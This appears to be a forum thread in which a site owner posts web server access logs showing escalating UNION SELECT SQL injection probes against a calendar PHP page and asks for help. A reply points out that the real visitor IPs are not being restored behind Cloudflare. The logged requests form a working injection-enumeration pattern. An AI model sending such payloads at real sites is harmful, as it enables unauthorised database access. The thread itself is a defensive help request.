Cloudflare hacking?

It seems like Cloudflare is repeatedly calling a webpage on our site (btcnj.com) with “nonsense” data. The data is SQL commands and they keep getting bigger. It looks like an injection attack.

What is going on?

This is what the access logs look like for this:

162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20–%20 HTTP/1.0” 200 4733 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20–%20 HTTP/1.0” 200 4740 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20–%20 HTTP/1.0” 200 4743 “-” “-”
162.158.91.65 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20–%20 HTTP/1.0” 200 4747 “-” “-”
162.158.88.188 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20–%20 HTTP/1.0” 200 4750 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20–%20 HTTP/1.0” 200 4753 “-” “-”
162.158.91.41 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20–%20 HTTP/1.0” 200 4756 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20–%20 HTTP/1.0” 200 4759 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20–%20 HTTP/1.0” 200 4763 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20–%20 HTTP/1.0” 200 4768 “-” “-”
162.158.90.156 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20–%20 HTTP/1.0” 200 4770 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20–%20 HTTP/1.0” 200 4774 “-” “-”
162.158.88.50 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20–%20 HTTP/1.0” 200 4778 “-” “-”
162.158.89.133 - - [21/Mar/2020:10:14:20 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20–%20 HTTP/1.0” 200 4783 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:21 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20–%20 HTTP/1.0” 200 4787 “-” “-”

You are not rewriting IP addresses -> https://support.cloudflare.com/hc/en-us/sections/200805497-Restoring-Visitor-IPs

2 Likes

Thanks.

Some of the IP addresses in the log are already not cloudflare’s.

I’m not sure if my hosting company is going to let me install that package.

This topic was automatically closed after 30 days. New replies are no longer allowed.